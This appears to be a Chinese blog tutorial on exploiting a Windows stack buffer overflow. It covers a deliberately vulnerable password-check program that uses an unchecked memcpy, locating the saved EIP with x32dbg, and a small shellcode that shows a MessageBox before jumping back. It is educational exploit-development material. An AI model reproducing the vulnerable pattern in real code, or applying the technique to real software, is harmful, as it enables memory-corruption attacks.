windows_栈溢出-优快云博客

#define _CRT_SECURE_NO_WARNINGS
#include<Windows.h>
#include<iostream>
#define PASSWORD "s_hook"
using namespace std;
int checkPassword(const char* password, int size)
{
	char buff[7]{ 0 };
	int result = 1;
	memcpy(buff, password, size);
	result = strcmp(PASSWORD, buff);
	return result;
}

int main()
{
	int flag = 0;
	char password[500]{ 0 };
	FILE* fp = NULL;
	if ((fp = fopen("password.txt", "rb")) == NULL)
	{
		cout << "Open failed" << endl;
		return 0;
	}
	fread(password, sizeof(password), 1, fp);
	flag = checkPassword(password, sizeof(password));
	if (flag)
	{
		MessageBoxA(0, "Password Error!", "Attention", MB_OK);
	}
	else
	{
		MessageBoxA(0, "Password Correct!", "Attention", MB_OK);
	}
}

我们先设置一下配置属性，然后再生成解决方案。

在这里插入图片描述

我们现在的目标，不但要让程序弹出Password Correct，还要让程序执行我们自己的代码，也就是shellcode。

因为我们使用x86平台生成的程序，因此我们使用x32dbg打开程序：
首先要找到main函数，我们先进入这个jmp：
在这里插入图片描述

往下翻一翻，就找到main函数了：
在这里插入图片描述

然后进去我们的checkPassword函数：

在这里插入图片描述
我们根据ebp的值，找到当前的局部变量区域：
当前的ebp地址是0x19FD20，我们通过[ebp-4]和[ebp-C]来找到局部变量，这个本来局部变量只有7+4=11字节，但是程序却sub esp,C，开辟了12字节，是因为内存对齐。

注意，我们虽然没有开随机基址，但我们用此代码生成的程序，重启电脑后所有地址都会被改变，包括下面的程序涉及到的绝对地址。如何解决此问题我们以后再来说。如果要自己复现，请使用本文的分析方法，把程序的地址替换为自己的地址。

因此，我们的思路是，如果我们在password.txt文件中，写入足够的字节，覆盖掉main函数的call checkPassword存入的EIP，让这个EIP跳转到我们代码的位置，那不就实现了注入shellcode吗？

现在的问题来了，我们唯一的输入途径只有password.txt文件，那我们如何输入东西使得机器能识别我们的代码呢？这时候，我们就利用x32dbg来帮助我们提取shellcode。

#include<Windows.h>
#include<iostream>
void _declspec(naked) shellcode()
{
	__asm
	{
		push 0;
		push 0;
		push 0;
		push 0;
		mov eax, 0x767AAC60;
		call eax;
		xor eax, eax;
		mov ebx, 0x0040164A;
		jmp ebx;
	}
}
int main2()
{
	LoadLibraryA("user32.dll");//必须要LoadLibrary才能调用MessageBoxA函数
	shellcode();
	return 0;
 }